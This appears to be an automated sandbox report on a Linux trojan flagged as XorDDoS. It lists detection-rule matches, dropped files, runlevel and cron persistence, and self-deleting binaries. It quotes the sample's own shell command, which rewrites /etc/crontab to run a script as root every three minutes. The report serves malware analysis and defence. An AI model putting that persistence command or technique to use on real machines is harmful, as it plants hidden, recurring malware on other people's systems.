Source: 6455.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6455.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6457.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6457.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6457.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6457.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6457.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6457.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6521.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6521.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6521.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6521.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6521.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6521.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6503.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6503.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6503.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6503.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6503.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6503.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6342.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6342.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16

Source: classification engine

Classification label: mal100.troj.evad.linELF@0/21@17/0

Source: /tmp/TmoTjBkSXT.elf (PID: 6221)

/run/gcc.pid: fbpaucfvzjbaiwwnoatvvvwtwyyvwkce

Jump to behavior

Persistence and Installation Behavior

Sample tries to persist itself using System V runlevels

Source: /tmp/TmoTjBkSXT.elf (PID: 6221)	File: /etc/rc1.d/S90TmoTjBkSXT.elf -> /etc/init.d/TmoTjBkSXT.elf	Jump to behavior
Source: /tmp/TmoTjBkSXT.elf (PID: 6221)	File: /etc/rc2.d/S90TmoTjBkSXT.elf -> /etc/init.d/TmoTjBkSXT.elf	Jump to behavior
Source: /tmp/TmoTjBkSXT.elf (PID: 6221)	File: /etc/rc3.d/S90TmoTjBkSXT.elf -> /etc/init.d/TmoTjBkSXT.elf	Jump to behavior
Source: /tmp/TmoTjBkSXT.elf (PID: 6221)	File: /etc/rc4.d/S90TmoTjBkSXT.elf -> /etc/init.d/TmoTjBkSXT.elf	Jump to behavior
Source: /tmp/TmoTjBkSXT.elf (PID: 6221)	File: /etc/rc5.d/S90TmoTjBkSXT.elf -> /etc/init.d/TmoTjBkSXT.elf	Jump to behavior
Source: /tmp/TmoTjBkSXT.elf (PID: 6221)	File: /etc/rc.d/rc1.d/S90TmoTjBkSXT.elf -> /etc/init.d/TmoTjBkSXT.elf	Jump to behavior
Source: /tmp/TmoTjBkSXT.elf (PID: 6221)	File: /etc/rc.d/rc2.d/S90TmoTjBkSXT.elf -> /etc/init.d/TmoTjBkSXT.elf	Jump to behavior
Source: /tmp/TmoTjBkSXT.elf (PID: 6221)	File: /etc/rc.d/rc3.d/S90TmoTjBkSXT.elf -> /etc/init.d/TmoTjBkSXT.elf	Jump to behavior
Source: /tmp/TmoTjBkSXT.elf (PID: 6221)	File: /etc/rc.d/rc4.d/S90TmoTjBkSXT.elf -> /etc/init.d/TmoTjBkSXT.elf	Jump to behavior
Source: /tmp/TmoTjBkSXT.elf (PID: 6221)	File: /etc/rc.d/rc5.d/S90TmoTjBkSXT.elf -> /etc/init.d/TmoTjBkSXT.elf	Jump to behavior

Sample tries to persist itself using cron

Source: /tmp/TmoTjBkSXT.elf (PID: 6221)	File: /etc/cron.hourly/gcc.sh	Jump to behavior
Source: /bin/sh (PID: 6226)	File: /etc/crontab	Jump to behavior
Source: /bin/sed (PID: 6227)	File: /etc/crontab	Jump to behavior

Source: /tmp/TmoTjBkSXT.elf (PID: 6226)

Shell command executed: sh -c "sed -i '/\\/etc\\/cron.hourly\\/gcc.sh/d' /etc/crontab && echo '*/3 * * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab"

Jump to behavior

Source: /sbin/update-rc.d (PID: 6231)

Systemctl executable: /bin/systemctl -> systemctl daemon-reload

Jump to behavior

Source: /tmp/TmoTjBkSXT.elf (PID: 6221)	Reads from proc file: /proc/stat	Jump to behavior
Source: /tmp/TmoTjBkSXT.elf (PID: 6221)	Reads from proc file: /proc/meminfo	Jump to behavior
Source: /tmp/TmoTjBkSXT.elf (PID: 6221)	Reads from proc file: /proc/cpuinfo	Jump to behavior

Source: /tmp/TmoTjBkSXT.elf (PID: 6221)	File written: /usr/lib/libudev.so	Jump to dropped file
Source: /tmp/TmoTjBkSXT.elf (PID: 6221)	File written: /usr/bin/wrvgghkqdd	Jump to dropped file
Source: /tmp/TmoTjBkSXT.elf (PID: 6221)	File written: /usr/bin/mqnheeruxi	Jump to dropped file
Source: /tmp/TmoTjBkSXT.elf (PID: 6221)	File written: /usr/bin/rfjhcudkoa	Jump to dropped file
Source: /tmp/TmoTjBkSXT.elf (PID: 6221)	File written: /usr/bin/eygutfitxp	Jump to dropped file
Source: /tmp/TmoTjBkSXT.elf (PID: 6221)	File written: /usr/bin/ljhaidbadz	Jump to dropped file
Source: /tmp/TmoTjBkSXT.elf (PID: 6221)	File written: /usr/bin/ogbruyreel	Jump to dropped file
Source: /tmp/TmoTjBkSXT.elf (PID: 6221)	File written: /usr/bin/xilfqxoepi	Jump to dropped file
Source: /tmp/TmoTjBkSXT.elf (PID: 6221)	File written: /usr/bin/ucawyxmhdv	Jump to dropped file
Source: /tmp/TmoTjBkSXT.elf (PID: 6221)	File written: /usr/bin/flfoijfhrh	Jump to dropped file
Source: /tmp/TmoTjBkSXT.elf (PID: 6221)	File written: /usr/bin/zuuufkngmy	Jump to dropped file
Source: /tmp/TmoTjBkSXT.elf (PID: 6221)	File written: /usr/bin/pmvkvnihjm	Jump to dropped file
Source: /tmp/TmoTjBkSXT.elf (PID: 6221)	File written: /usr/bin/vwtoogupfm	Jump to dropped file
Source: /tmp/TmoTjBkSXT.elf (PID: 6221)	File written: /usr/bin/zygafieftp	Jump to dropped file
Source: /tmp/TmoTjBkSXT.elf (PID: 6221)	File written: /usr/bin/ybavzvdbws	Jump to dropped file
Source: /tmp/TmoTjBkSXT.elf (PID: 6221)	File written: /usr/bin/piqqogcjxo	Jump to dropped file

Source: /tmp/TmoTjBkSXT.elf (PID: 6221)

Writes shell script file to disk with an unusual file extension: /etc/init.d/TmoTjBkSXT.elf

Jump to dropped file

Source: /tmp/TmoTjBkSXT.elf (PID: 6221)

Shell script file created: /etc/cron.hourly/gcc.sh

Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Drops files in suspicious directories

Source: /tmp/TmoTjBkSXT.elf (PID: 6221)	File: /etc/init.d/TmoTjBkSXT.elf	Jump to dropped file
Source: /tmp/TmoTjBkSXT.elf (PID: 6221)	File: /usr/bin/wrvgghkqdd	Jump to dropped file
Source: /tmp/TmoTjBkSXT.elf (PID: 6221)	File: /usr/bin/mqnheeruxi	Jump to dropped file
Source: /tmp/TmoTjBkSXT.elf (PID: 6221)	File: /usr/bin/rfjhcudkoa	Jump to dropped file
Source: /tmp/TmoTjBkSXT.elf (PID: 6221)	File: /usr/bin/eygutfitxp	Jump to dropped file
Source: /tmp/TmoTjBkSXT.elf (PID: 6221)	File: /usr/bin/ljhaidbadz	Jump to dropped file
Source: /tmp/TmoTjBkSXT.elf (PID: 6221)	File: /usr/bin/ogbruyreel	Jump to dropped file
Source: /tmp/TmoTjBkSXT.elf (PID: 6221)	File: /usr/bin/xilfqxoepi	Jump to dropped file
Source: /tmp/TmoTjBkSXT.elf (PID: 6221)	File: /usr/bin/ucawyxmhdv	Jump to dropped file
Source: /tmp/TmoTjBkSXT.elf (PID: 6221)	File: /usr/bin/flfoijfhrh	Jump to dropped file
Source: /tmp/TmoTjBkSXT.elf (PID: 6221)	File: /usr/bin/zuuufkngmy	Jump to dropped file
Source: /tmp/TmoTjBkSXT.elf (PID: 6221)	File: /usr/bin/pmvkvnihjm	Jump to dropped file
Source: /tmp/TmoTjBkSXT.elf (PID: 6221)	File: /usr/bin/vwtoogupfm	Jump to dropped file
Source: /tmp/TmoTjBkSXT.elf (PID: 6221)	File: /usr/bin/zygafieftp	Jump to dropped file
Source: /tmp/TmoTjBkSXT.elf (PID: 6221)	File: /usr/bin/ybavzvdbws	Jump to dropped file
Source: /tmp/TmoTjBkSXT.elf (PID: 6221)	File: /usr/bin/piqqogcjxo	Jump to dropped file

Sample deletes itself

Source: /tmp/TmoTjBkSXT.elf (PID: 6221)	File: /usr/bin/wrvgghkqdd	Jump to behavior
Source: /tmp/TmoTjBkSXT.elf (PID: 6221)	File: /usr/bin/mqnheeruxi	Jump to behavior
Source: /tmp/TmoTjBkSXT.elf (PID: 6221)	File: /usr/bin/rfjhcudkoa	Jump to behavior
Source: /tmp/TmoTjBkSXT.elf (PID: 6221)	File: /usr/bin/eygutfitxp	Jump to behavior
Source: /tmp/TmoTjBkSXT.elf (PID: 6221)	File: /usr/bin/ljhaidbadz	Jump to behavior
Source: /tmp/TmoTjBkSXT.elf (PID: 6221)	File: /usr/bin/ogbruyreel	Jump to behavior
Source: /tmp/TmoTjBkSXT.elf (PID: 6221)	File: /usr/bin/xilfqxoepi	Jump to behavior
Source: /tmp/TmoTjBkSXT.elf (PID: 6221)	File: /usr/bin/ucawyxmhdv	Jump to behavior
Source: /tmp/TmoTjBkSXT.elf (PID: 6221)	File: /usr/bin/flfoijfhrh	Jump to behavior
Source: /tmp/TmoTjBkSXT.elf (PID: 6221)	File: /usr/bin/zuuufkngmy	Jump to behavior
Source: /tmp/TmoTjBkSXT.elf (PID: 6221)	File: /usr/bin/pmvkvnihjm	Jump to behavior
Source: /tmp/TmoTjBkSXT.elf (PID: 6221)	File: /usr/bin/vwtoogupfm	Jump to behavior
Source: /tmp/TmoTjBkSXT.elf (PID: 6221)	File: /usr/bin/zygafieftp	Jump to behavior
Source: /tmp/TmoTjBkSXT.elf (PID: 6221)	File: /usr/bin/ybavzvdbws	Jump to behavior
Source: /tmp/TmoTjBkSXT.elf (PID: 6221)	File: /usr/bin/piqqogcjxo	Jump to behavior
Source: /tmp/TmoTjBkSXT.elf (PID: 6221)	File: /usr/bin/mqwsbvfumc	Jump to behavior
Source: /tmp/TmoTjBkSXT.elf (PID: 6221)	File: /usr/bin/uonpajpwtj	Jump to behavior
Source: /tmp/TmoTjBkSXT.elf (PID: 6221)	File: /usr/bin/qmlitbamhb	Jump to behavior
Source: /tmp/TmoTjBkSXT.elf (PID: 6221)	File: /usr/bin/uoqnuhuwzn	Jump to behavior
Source: /tmp/TmoTjBkSXT.elf (PID: 6221)	File: /usr/bin/pmctuvfdvh	Jump to behavior
Source: /tmp/TmoTjBkSXT.elf (PID: 6221)	File: /usr/bin/snvjsgswbz	Jump to behavior
Source: /tmp/TmoTjBkSXT.elf (PID: 6221)	File: /usr/bin/abhfppzmcz	Jump to behavior
Source: /usr/bin/wrvgghkqdd (PID: 6255)	File: /usr/bin/wrvgghkqdd	Jump to behavior
Source: /usr/bin/wrvgghkqdd (PID: 6260)	File: /usr/bin/wrvgghkqdd	Jump to behavior
Source: /usr/bin/wrvgghkqdd (PID: 6263)	File: /usr/bin/wrvgghkqdd	Jump to behavior
Source: /usr/bin/wrvgghkqdd (PID: 6266)	File: /usr/bin/wrvgghkqdd	Jump to behavior
Source: /usr/bin/wrvgghkqdd (PID: 6267)	File: /usr/bin/wrvgghkqdd	Jump to behavior
Source: /usr/bin/mqnheeruxi (PID: 6273)	File: /usr/bin/mqnheeruxi	Jump to behavior
Source: /usr/bin/mqnheeruxi (PID: 6278)	File: /usr/bin/mqnheeruxi	Jump to behavior
Source: /usr/bin/mqnheeruxi (PID: 6282)	File: /usr/bin/mqnheeruxi	Jump to behavior
Source: /usr/bin/mqnheeruxi (PID: 6284)	File: /usr/bin/mqnheeruxi	Jump to behavior
Source: /usr/bin/mqnheeruxi (PID: 6285)	File: /usr/bin/mqnheeruxi	Jump to behavior
Source: /usr/bin/rfjhcudkoa (PID: 6290)	File: /usr/bin/rfjhcudkoa	Jump to behavior
Source: /usr/bin/rfjhcudkoa (PID: 6295)	File: /usr/bin/rfjhcudkoa	Jump to behavior
Source: /usr/bin/rfjhcudkoa (PID: 6298)	File: /usr/bin/rfjhcudkoa	Jump to behavior
Source: /usr/bin/rfjhcudkoa (PID: 6301)	File: /usr/bin/rfjhcudkoa	Jump to behavior
Source: /usr/bin/rfjhcudkoa (PID: 6302)	File: /usr/bin/rfjhcudkoa	Jump to behavior
Source: /usr/bin/eygutfitxp (PID: 6327)	File: /usr/bin/eygutfitxp	Jump to behavior
Source: /usr/bin/eygutfitxp (PID: 6332)	File: /usr/bin/eygutfitxp	Jump to behavior
Source: /usr/bin/eygutfitxp (PID: 6335)	File: /usr/bin/eygutfitxp	Jump to behavior
Source: /usr/bin/eygutfitxp (PID: 6338)	File: /usr/bin/eygutfitxp	Jump to behavior
Source: /usr/bin/eygutfitxp (PID: 6339)	File: /usr/bin/eygutfitxp	Jump to behavior
Source: /usr/bin/ljhaidbadz (PID: 6344)	File: /usr/bin/ljhaidbadz	Jump to behavior
Source: /usr/bin/ljhaidbadz (PID: 6347)	File: /usr/bin/ljhaidbadz	Jump to behavior
Source: /usr/bin/ljhaidbadz (PID: 6352)	File: /usr/bin/ljhaidbadz	Jump to behavior
Source: /usr/bin/ljhaidbadz (PID: 6355)	File: /usr/bin/ljhaidbadz	Jump to behavior
Source: /usr/bin/ljhaidbadz (PID: 6356)	File: /usr/bin/ljhaidbadz	Jump to behavior
Source: /usr/bin/ogbruyreel (PID: 6361)	File: /usr/bin/ogbruyreel	Jump to behavior
Source: /usr/bin/ogbruyreel (PID: 6368)	File: /usr/bin/ogbruyreel	Jump to behavior
Source: /usr/bin/ogbruyreel (PID: 6371)	File: /usr/bin/ogbruyreel	Jump to behavior
Source: /usr/bin/ogbruyreel (PID: 6374)	File: /usr/bin/ogbruyreel	Jump to behavior
Source: /usr/bin/ogbruyreel (PID: 6375)	File: /usr/bin/ogbruyreel	Jump to behavior
Source: /usr/bin/xilfqxoepi (PID: 6380)	File: /usr/bin/xilfqxoepi	Jump to behavior
Source: /usr/bin/xilfqxoepi (PID: 6385)	File: /usr/bin/xilfqxoepi	Jump to behavior
Source: /usr/bin/xilfqxoepi (PID: 6388)	File: /usr/bin/xilfqxoepi	Jump to behavior
Source: /usr/bin/xilfqxoepi (PID: 6391)	File: /usr/bin/xilfqxoepi	Jump to behavior
Source: /usr/bin/xilfqxoepi (PID: 6392)	File: /usr/bin/xilfqxoepi	Jump to behavior
Source: /usr/bin/ucawyxmhdv (PID: 6397)	File: /usr/bin/ucawyxmhdv	Jump to behavior
Source: /usr/bin/ucawyxmhdv (PID: 6400)	File: /usr/bin/ucawyxmhdv	Jump to behavior
Source: /usr/bin/ucawyxmhdv (PID: 6405)	File: /usr/bin/ucawyxmhdv	Jump to behavior
Source: /usr/bin/ucawyxmhdv (PID: 6408)	File: /usr/bin/ucawyxmhdv	Jump to behavior
Source: /usr/bin/ucawyxmhdv (PID: 6409)	File: /usr/bin/ucawyxmhdv	Jump to behavior
Source: /usr/bin/flfoijfhrh (PID: 6414)	File: /usr/bin/flfoijfhrh	Jump to behavior
Source: /usr/bin/flfoijfhrh (PID: 6417)	File: /usr/bin/flfoijfhrh	Jump to behavior
Source: /usr/bin/flfoijfhrh (PID: 6423)	File: /usr/bin/flfoijfhrh	Jump to behavior
Source: /usr/bin/flfoijfhrh (PID: 6425)	File: /usr/bin/flfoijfhrh	Jump to behavior
Source: /usr/bin/flfoijfhrh (PID: 6426)	File: /usr/bin/flfoijfhrh	Jump to behavior
Source: /usr/bin/zuuufkngmy (PID: 6434)	File: /usr/bin/zuuufkngmy	Jump to behavior
Source: /usr/bin/zuuufkngmy (PID: 6439)	File: /usr/bin/zuuufkngmy	Jump to behavior
Source: /usr/bin/zuuufkngmy (PID: 6442)	File: /usr/bin/zuuufkngmy	Jump to behavior
Source: /usr/bin/zuuufkngmy (PID: 6445)	File: /usr/bin/zuuufkngmy	Jump to behavior
Source: /usr/bin/zuuufkngmy (PID: 6446)	File: /usr/bin/zuuufkngmy	Jump to behavior
Source: /usr/bin/pmvkvnihjm (PID: 6451)	File: /usr/bin/pmvkvnihjm	Jump to behavior
Source: /usr/bin/pmvkvnihjm (PID: 6454)	File: /usr/bin/pmvkvnihjm	Jump to behavior
Source: /usr/bin/pmvkvnihjm (PID: 6461)	File: /usr/bin/pmvkvnihjm	Jump to behavior
Source: /usr/bin/pmvkvnihjm (PID: 6462)	File: /usr/bin/pmvkvnihjm	Jump to behavior
Source: /usr/bin/pmvkvnihjm (PID: 6463)	File: /usr/bin/pmvkvnihjm	Jump to behavior
Source: /usr/bin/vwtoogupfm (PID: 6468)	File: /usr/bin/vwtoogupfm	Jump to behavior
Source: /usr/bin/vwtoogupfm (PID: 6473)	File: /usr/bin/vwtoogupfm	Jump to behavior
Source: /usr/bin/vwtoogupfm (PID: 6476)	File: /usr/bin/vwtoogupfm	Jump to behavior
Source: /usr/bin/vwtoogupfm (PID: 6479)	File: /usr/bin/vwtoogupfm	Jump to behavior
Source: /usr/bin/vwtoogupfm (PID: 6480)	File: /usr/bin/vwtoogupfm	Jump to behavior
Source: /usr/bin/zygafieftp (PID: 6485)	File: /usr/bin/zygafieftp	Jump to behavior
Source: /usr/bin/zygafieftp (PID: 6490)	File: /usr/bin/zygafieftp	Jump to behavior
Source: /usr/bin/zygafieftp (PID: 6495)	File: /usr/bin/zygafieftp	Jump to behavior
Source: /usr/bin/zygafieftp (PID: 6496)	File: /usr/bin/zygafieftp	Jump to behavior
Source: /usr/bin/zygafieftp (PID: 6497)	File: /usr/bin/zygafieftp	Jump to behavior
Source: /usr/bin/ybavzvdbws (PID: 6502)	File: /usr/bin/ybavzvdbws	Jump to behavior
Source: /usr/bin/ybavzvdbws (PID: 6505)	File: /usr/bin/ybavzvdbws	Jump to behavior
Source: /usr/bin/ybavzvdbws (PID: 6510)	File: /usr/bin/ybavzvdbws	Jump to behavior
Source: /usr/bin/ybavzvdbws (PID: 6513)	File: /usr/bin/ybavzvdbws	Jump to behavior
Source: /usr/bin/ybavzvdbws (PID: 6514)	File: /usr/bin/ybavzvdbws	Jump to behavior
Source: /usr/bin/piqqogcjxo (PID: 6520)	File: /usr/bin/piqqogcjxo	Jump to behavior
Source: /usr/bin/piqqogcjxo (PID: 6525)	File: /usr/bin/piqqogcjxo	Jump to behavior
Source: /usr/bin/piqqogcjxo (PID: 6530)	File: /usr/bin/piqqogcjxo	Jump to behavior
Source: /usr/bin/piqqogcjxo (PID: 6533)	File: /usr/bin/piqqogcjxo	Jump to behavior
Source: /usr/bin/piqqogcjxo (PID: 6534)	File: /usr/bin/piqqogcjxo	Jump to behavior
Source: /usr/bin/mqwsbvfumc (PID: 6539)	File: /usr/bin/mqwsbvfumc	Jump to behavior
Source: /usr/bin/mqwsbvfumc (PID: 6542)	File: /usr/bin/mqwsbvfumc	Jump to behavior
Source: /usr/bin/mqwsbvfumc (PID: 6547)	File: /usr/bin/mqwsbvfumc	Jump to behavior
Source: /usr/bin/mqwsbvfumc (PID: 6550)	File: /usr/bin/mqwsbvfumc	Jump to behavior
Source: /usr/bin/mqwsbvfumc (PID: 6551)	File: /usr/bin/mqwsbvfumc	Jump to behavior
Source: /usr/bin/uonpajpwtj (PID: 6556)	File: /usr/bin/uonpajpwtj	Jump to behavior
Source: /usr/bin/uonpajpwtj (PID: 6561)	File: /usr/bin/uonpajpwtj	Jump to behavior
Source: /usr/bin/uonpajpwtj (PID: 6564)	File: /usr/bin/uonpajpwtj	Jump to behavior
Source: /usr/bin/uonpajpwtj (PID: 6567)	File: /usr/bin/uonpajpwtj	Jump to behavior
Source: /usr/bin/uonpajpwtj (PID: 6568)	File: /usr/bin/uonpajpwtj	Jump to behavior
Source: /usr/bin/qmlitbamhb (PID: 6578)	File: /usr/bin/qmlitbamhb	Jump to behavior
Source: /usr/bin/qmlitbamhb (PID: 6583)	File: /usr/bin/qmlitbamhb	Jump to behavior
Source: /usr/bin/qmlitbamhb (PID: 6584)	File: /usr/bin/qmlitbamhb	Jump to behavior
Source: /usr/bin/qmlitbamhb (PID: 6585)	File: /usr/bin/qmlitbamhb	Jump to behavior
Source: /usr/bin/qmlitbamhb (PID: 6586)	File: /usr/bin/qmlitbamhb	Jump to behavior
Source: /usr/bin/uoqnuhuwzn (PID: 6595)	File: /usr/bin/uoqnuhuwzn	Jump to behavior
Source: /usr/bin/uoqnuhuwzn (PID: 6598)	File: /usr/bin/uoqnuhuwzn	Jump to behavior
Source: /usr/bin/uoqnuhuwzn (PID: 6601)	File: /usr/bin/uoqnuhuwzn	Jump to behavior
Source: /usr/bin/uoqnuhuwzn (PID: 6602)	File: /usr/bin/uoqnuhuwzn	Jump to behavior
Source: /usr/bin/uoqnuhuwzn (PID: 6603)	File: /usr/bin/uoqnuhuwzn	Jump to behavior
Source: /usr/bin/pmctuvfdvh (PID: 6612)	File: /usr/bin/pmctuvfdvh	Jump to behavior
Source: /usr/bin/pmctuvfdvh (PID: 6617)	File: /usr/bin/pmctuvfdvh	Jump to behavior
Source: /usr/bin/pmctuvfdvh (PID: 6618)	File: /usr/bin/pmctuvfdvh	Jump to behavior
Source: /usr/bin/pmctuvfdvh (PID: 6619)	File: /usr/bin/pmctuvfdvh	Jump to behavior
Source: /usr/bin/pmctuvfdvh (PID: 6620)	File: /usr/bin/pmctuvfdvh	Jump to behavior
Source: /usr/bin/snvjsgswbz (PID: 6632)	File: /usr/bin/snvjsgswbz	Jump to behavior
Source: /usr/bin/snvjsgswbz (PID: 6636)	File: /usr/bin/snvjsgswbz	Jump to behavior
